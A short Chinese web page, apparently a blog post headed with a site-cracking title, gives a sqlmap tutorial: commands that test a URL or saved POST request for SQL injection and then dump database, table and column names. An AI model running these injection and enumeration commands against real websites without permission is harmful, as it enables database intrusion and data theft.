建站系统破解/网络推广怎么做?

sqlmap用于

sqlmap是一款非常强大的开源sql自动化注入工具，可以用来检测和利用sql注入漏洞。注意：sqlmap只是用来检测和利用sql注入点的，使用前请先使用扫描工具扫出sql注入点。

1、检测注入
GET注入
sqlmap -u “http://www.vuln.cn/post.php?id=1″ 默认使用level1检测全部数据库类型

sqlmap -u “http://www.vuln.cn/post.php?id=1″ –dbms mysql –level 3 指定数据库类型为mysql，级别为3（共5级，级别越高，检测越全面

post中注入可以使用Fiddler工具来抓取post包,把请求保存在txt文件里  sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql 指定username参数

(-u：指定注入点url;-r REQUESTFILE 从一个文件中载入HTTP请求;-p TESTPARAMETER 可注入的参数)

2、爆库：sqlmap -u "url(注入点)" --dbs （有的系统支持的不是sqlmap+参数，而是Python sqlmap.py+参数）

3、爆表:sqlmap -u "url" -D 要爆的表所在库 --tables

4、爆字段：sqlmap -u "url" -D (库)  -T （表）--columns

参考文章：https://www.cnblogs.com/50614090/p/6086054.html